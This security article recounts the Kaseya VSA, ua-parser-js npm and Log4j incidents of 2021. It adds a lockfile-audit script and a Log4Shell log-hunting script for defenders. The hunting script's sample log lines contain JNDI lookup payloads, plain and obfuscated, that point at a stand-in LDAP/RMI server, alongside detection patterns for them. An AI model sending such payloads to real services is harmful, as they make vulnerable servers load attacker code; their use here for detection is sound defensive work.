Ransomware Trends 3

In July 2021, adversaries exploited vulnerabilities in Kaseya VSA, an IT management product widely used by managed service providers (MSPs) to administer their customers' systems remotely, as part of a campaign to spread the Sodinokibi ransomware, better known as REvil. The attackers used zero-day vulnerabilities to take control of MSPs' on-premises VSA servers and then used VSA's own remote management capability to push the ransomware onto the endpoints of the MSPs' customers. According to Kaseya, the compromise affected around 50 direct VSA customers and between 800 and 1,500 downstream organisations. It also drew the attention of the US government, which later indicted the accused perpetrators.

npm is the package registry for Node.js; it hosts libraries that developers download and incorporate into their own software. In October 2021, attackers took over the npm account of the maintainer of ua-parser-js, an open-source JavaScript library with roughly 7 to 8 million weekly downloads, and published trojanised versions of it that installed password stealers and cryptocurrency miners. At the time the npm registry did not require multifactor authentication (MFA) for package author accounts, which is what allowed an unknown adversary to hijack a number of author accounts; once in control of an account, the adversary can publish malware-laced copies of an otherwise legitimate package under its real name, and every downstream project that picks up the new version installs the payload. The victims therefore included both package maintainers and the end users of programs that depend on such packages. ua-parser-js was used by Google, Amazon, Facebook, IBM and Microsoft, among many others.
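One control that limits exposure to the kind of package hijack described above is to treat the lockfile as a reviewed artefact rather than something that silently drifts. The script below is an added example written for this page, not code from npm or from the ua-parser-js project: it audits a package-lock.json in the lockfileVersion 2 layout against a baseline of versions and integrity hashes a reviewer has approved, flags packages resolved from anywhere other than the public registry, and flags packages that npm has marked as running install-time lifecycle scripts (preinstall, install or postinstall), which is how trojanised releases typically execute their payload. The lockfile, the baseline, the package names other than ua-parser-js, every version number and every integrity string are constructed placeholders.

```python
import json
from dataclasses import dataclass

REGISTRY_PREFIX = "https://registry.npmjs.org/"

# Constructed package-lock.json in the lockfileVersion 2 layout. Every version
# number, integrity string and the packages other than ua-parser-js are
# placeholders invented for this example, not real registry data.
SAMPLE_LOCK = json.loads(r'''{
  "name": "example-app",
  "lockfileVersion": 2,
  "packages": {
    "": {
      "name": "example-app",
      "version": "1.0.0",
      "dependencies": {"ua-parser-js": "^1.2.3", "tiny-logger": "^2.0.0"}
    },
    "node_modules/ua-parser-js": {
      "version": "1.2.4",
      "resolved": "https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-1.2.4.tgz",
      "integrity": "sha512-CONSTRUCTED-HASH-B",
      "hasInstallScript": true,
      "dependencies": {"helper-dl": "0.0.1"}
    },
    "node_modules/ua-parser-js/node_modules/helper-dl": {
      "version": "0.0.1",
      "resolved": "https://cdn.example.invalid/helper-dl-0.0.1.tgz",
      "integrity": "sha512-CONSTRUCTED-HASH-X"
    },
    "node_modules/tiny-logger": {
      "version": "2.0.0",
      "resolved": "https://registry.npmjs.org/tiny-logger/-/tiny-logger-2.0.0.tgz",
      "integrity": "sha512-CONSTRUCTED-HASH-C"
    }
  }
}''')

# What a reviewer last approved: the exact version and the integrity hash of
# the tarball that was vetted (constructed values). A lockfile that matches
# this exactly installs only code somebody has looked at.
BASELINE = {
    "ua-parser-js": {"version": "1.2.3", "integrity": "sha512-CONSTRUCTED-HASH-A"},
    "tiny-logger": {"version": "2.0.0", "integrity": "sha512-CONSTRUCTED-HASH-C"},
}


@dataclass(frozen=True)
class Finding:
    package: str
    reason: str


def package_name(lock_path: str) -> str:
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (nested and scoped packages)."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock: dict, baseline: dict) -> list:
    """Return every deviation from the approved baseline; an empty list means clean."""
    findings = []
    for path, entry in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project itself, not a dependency
        name = package_name(path)
        approved = baseline.get(name)
        if approved is None:
            findings.append(Finding(name, "not in the approved baseline"))
        else:
            if entry.get("version") != approved["version"]:
                findings.append(Finding(
                    name, f"version changed {approved['version']} -> {entry.get('version')}"))
            if entry.get("integrity") != approved["integrity"]:
                findings.append(Finding(name, "integrity hash differs from the vetted tarball"))
        resolved = str(entry.get("resolved", ""))
        if not resolved.startswith(REGISTRY_PREFIX):
            findings.append(Finding(name, f"resolved from an unexpected location: {resolved}"))
        if entry.get("hasInstallScript"):
            # npm sets this flag for packages declaring preinstall/install/postinstall.
            findings.append(Finding(
                name, "runs a lifecycle script at install time; review it before installing"))
    return findings


if __name__ == "__main__":
    for f in audit_lockfile(SAMPLE_LOCK, BASELINE):
        print(f"{f.package}: {f.reason}")
```

Run in CI before `npm ci`, a non-empty result should fail the build until a human updates the baseline. The lifecycle-script check complements installing with `npm ci --ignore-scripts`, which stops a hijacked release from executing anything at install time; it does not protect against malicious code that runs when the package is required. The older lockfileVersion 1 format stores a `dependencies` tree instead of `packages` and is not handled here.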

In December 2021, a remote code execution vulnerability was disclosed in Log4j, a widely used Java logging framework embedded in a great many third-party applications. Coin miners and botnets were the first threats to exploit it, but because of Log4j's enormous attack surface the community expected exploitation to broaden. Although it took adversaries a few weeks to get up to speed, by late December 2021 and early 2022 multiple operators were targeting internet-facing VMware Horizon servers running vulnerable versions of Log4j. Horizon was an attractive target because it is widely deployed and frequently exposed directly to the internet. Internet-facing applications that still use vulnerable versions of Log4j are expected to be targeted for months to come.
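Detection logic for hunting exploitation attempts in web server access logs, added here as an example and not code from VMware, the Log4j project or any vendor mentioned on this page. The Log4j flaw (CVE-2021-44228, widely known as Log4Shell) fires when attacker-supplied text containing a `${jndi:...}` lookup is logged, and attackers quickly began hiding that string behind nested lookups such as `${lower:j}`, the `${name:-default}` default-value syntax, and URL encoding. The scanner below decodes each line and collapses those nesting tricks the way Log4j's string substitution would before searching for the JNDI token, so it catches variants that a plain substring match misses; the last line of the script shows the difference. The log lines are constructed, with addresses from the documentation ranges 198.51.100.0/24 and 203.0.113.0/24.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic). Addresses are from the
# documentation ranges 198.51.100.0/24 and 203.0.113.0/24.
SAMPLE_LOG = [
    '203.0.113.10 - - [28/Dec/2021:03:14:07 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/Exploit}"',
    '203.0.113.10 - - [28/Dec/2021:03:14:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:ldap://198.51.100.23:1389/Exploit}"',
    '203.0.113.11 - - [28/Dec/2021:03:15:41 +0000] "GET / HTTP/1.1" 200 4096 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.23:1099/Exploit}"',
    '203.0.113.11 - - [28/Dec/2021:03:15:42 +0000] "GET / HTTP/1.1" 200 4096 "-" "${${env:NaN:-j}ndi:dns://198.51.100.23/probe}"',
    '198.51.100.50 - - [28/Dec/2021:03:16:02 +0000] "GET /portal/login HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '203.0.113.12 - - [28/Dec/2021:03:17:30 +0000] "GET /portal/info.jsp?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]

# An innermost ${...}: a lookup whose body contains no further "${".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The token we are hunting for, once obfuscation has been stripped.
JNDI_TOKEN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's substitutor would.

    Only the lookups attackers use to hide the payload are emulated; anything
    else (date, sys, and the jndi token itself) is left untouched.
    """
    body = match.group(1)
    key, _, arg = body.partition(":")
    key = key.strip().lower()
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if key == "jndi":
        return match.group(0)
    if ":-" in body:
        # ${name:-default}: an unknown or empty lookup falls back to the
        # default, which is how ${::-j} and ${env:NaN:-j} both become "j".
        return body.rsplit(":-", 1)[1]
    return match.group(0)


def normalize(text, max_rounds=16):
    """URL-decode, then repeatedly collapse innermost lookups until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_log(lines, resolve=True):
    """Return (line_number, evidence) for each line carrying a JNDI lookup.

    resolve=False matches the raw line, which is what a naive substring rule
    does; resolve=True catches the obfuscated and URL-encoded variants too.
    """
    hits = []
    for lineno, line in enumerate(lines, start=1):
        candidate = normalize(line) if resolve else line
        m = JNDI_TOKEN.search(candidate)
        if m:
            hits.append((lineno, candidate[m.start():m.start() + 80]))
    return hits


if __name__ == "__main__":
    for lineno, evidence in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {evidence}")
    print("naive rule matched", len(scan_log(SAMPLE_LOG, resolve=False)), "line(s)")
```

A hit here is an attempt, not proof of compromise: confirm exploitation by looking for outbound LDAP, RMI or DNS connections from the application host to the address in the lookup, and for child processes spawned by the Java process. The emulation covers lower, upper and default-value lookups only; Log4j supports other lookups (env, sys, date) that attackers can also abuse for nesting, so treat this as a starting point for a hunting query rather than a complete parser of the substitution language.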